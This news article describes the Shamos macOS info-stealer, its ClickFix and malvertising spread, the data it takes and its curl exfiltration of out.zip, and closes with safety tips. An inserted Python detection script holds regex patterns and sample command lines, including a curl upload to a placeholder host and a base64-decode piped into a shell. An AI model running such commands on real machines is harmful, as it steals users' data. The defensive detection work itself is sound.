It’s not just PC users who need to be careful on the internet. A dangerous new malware called Shamos is targeting macOS users, and it’s part of a growing trend of cyberattacks that trick people into infecting their own devices. Disguised as helpful guides or troubleshooting tools, Shamos is designed to steal sensitive information from unsuspecting users.
What Is Shamos?
Shamos is a variant of AMOS (Atomic macOS Stealer), developed by the COOKIE SPIDER cybercriminal group. It poses as legitimate software—such as manuals, guides, or fixes for macOS issues—and lures users into downloading it. Once installed, it steals:
- Browser credentials
- Apple Keychain items
- Apple Notes
- Cryptocurrency wallet data
How It Spreads
Cybersecurity firm CrowdStrike first detected Shamos and reports that over 300 environments have been targeted since June. The malware spreads through:
- Malvertising (malicious ads)
- Fake GitHub repositories
- ClickFix-style attacks — where users are tricked into running shell commands in Terminal to “fix” an issue
These attacks often use spoofed websites like mac-safer[.]com or rescue-mac[.]com, which appear to offer help for common macOS problems. Instead of solving anything, the commands users are told to run decode a malicious script that:
- Captures the user’s password
- Downloads the Shamos executable
- Executes the malware
What Happens After Infection
Once active, Shamos collects data from the infected Mac, including:
- Cryptocurrency wallet files
- Keychain and Notes data
- Browser-stored information
It then packages this data into a file called out.zip and sends it to the attackers using curl.
Shamos can also:
- Ensure persistence by running at startup (if installed with sudo privileges)
- Download additional payloads, such as fake apps (e.g., a spoofed Ledger Live wallet) or botnet modules
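As an added defender-side example (not code from the article, Tom's Guide or CrowdStrike): a small Python triage script that checks constructed process-execution records for the behaviours described above, a Terminal-launched command that base64-decodes into a shell, a curl upload of out.zip, and a startup-persistence write made as root. The record schema, the sample events, and the LaunchDaemons/LaunchAgents path used to model "running at startup" are assumptions, not details from the article.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Constructed process-execution record (hypothetical schema, not a real EDR export)."""
    parent: str      # name of the parent application (e.g. "Terminal")
    cmdline: str     # full command line of the child process
    as_root: bool    # True if the process ran with root (sudo) privileges


# Heuristics modelled on the article's description of the infection chain.
# 1) ClickFix step: a Terminal child decodes base64 and pipes the result into a shell.
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|--decode|-D).*\|\s*(ba|z)?sh\b")
# 2) Exfiltration step: curl uploading the out.zip archive the article names.
CURL_UPLOAD_OUT_ZIP = re.compile(r"\bcurl\b.*(-F|--form|-T|--upload-file|-d|--data-binary).*out\.zip")
# 3) Persistence step (assumption): a launchd plist written while running as root.
STARTUP_PERSIST = re.compile(r"/Library/Launch(Daemons|Agents)/")


def classify(event: ProcEvent) -> list:
    """Return the list of indicator names a single event matches (empty if benign)."""
    hits = []
    if event.parent == "Terminal" and DECODE_TO_SHELL.search(event.cmdline):
        hits.append("clickfix_decode_to_shell")
    if CURL_UPLOAD_OUT_ZIP.search(event.cmdline):
        hits.append("curl_upload_out_zip")
    if event.as_root and STARTUP_PERSIST.search(event.cmdline):
        hits.append("root_startup_persistence")
    return hits


def triage(events) -> list:
    """Return (index, indicators) for every event that matches at least one heuristic."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


# Constructed sample events: two benign, three mirroring the described behaviour.
SAMPLE_EVENTS = [
    ProcEvent("Terminal", "ls -la ~/Downloads", False),
    ProcEvent("Terminal", "echo 'aGVsbG8=' | base64 -d | sh", False),   # decodes "hello"
    ProcEvent("Terminal", "git clone https://example.invalid/repo.git", False),
    ProcEvent("sh", "curl -F file=@/tmp/out.zip http://example.invalid/upload", False),
    ProcEvent("sh", "cp /tmp/launcher.plist /Library/LaunchDaemons/com.example.plist", True),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The first heuristic is the one worth tuning on real telemetry: legitimate scripts also decode base64, so the Terminal-parent condition is what keeps the rule focused on the copy-paste scenario the article describes.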
Why ClickFix Attacks Are So Dangerous
ClickFix-style attacks are increasingly common and effective. They’ve been seen in:
- TikTok videos
- Fake CAPTCHAs
- Bogus Google Meet error fixes
These attacks are popular because they work—users unknowingly infect their own systems by following seemingly helpful instructions.
How to Stay Safe
If you’re a macOS user, here are some essential safety tips:
- Never run Terminal commands you find online unless you fully understand what they do and trust the source.
- Be cautious with GitHub repositories—malicious projects can be disguised as helpful tools.
- Avoid sponsored search results when troubleshooting macOS issues. Instead, use:
  - The Apple Community forums (moderated by Apple)
  - The built-in Help menu on your Mac
- Use trusted antivirus software for macOS. Paid options often include:
  - VPNs
  - Password managers
  - Secure browsers for financial transactions
Final Thoughts
ClickFix attacks are here to stay, and they’re being used in everything from ransomware to state-sponsored cyberattacks. Until Apple and other tech companies develop better defenses, your best protection is caution. Always verify the source before downloading or running anything on your Mac.
Thanks to Tom’s Guide for this important update
https://www.tomsguide.com/computing/online-security/macs-under-attack-from-dangerous-new-info-stealing-malware-how-to-stay-safe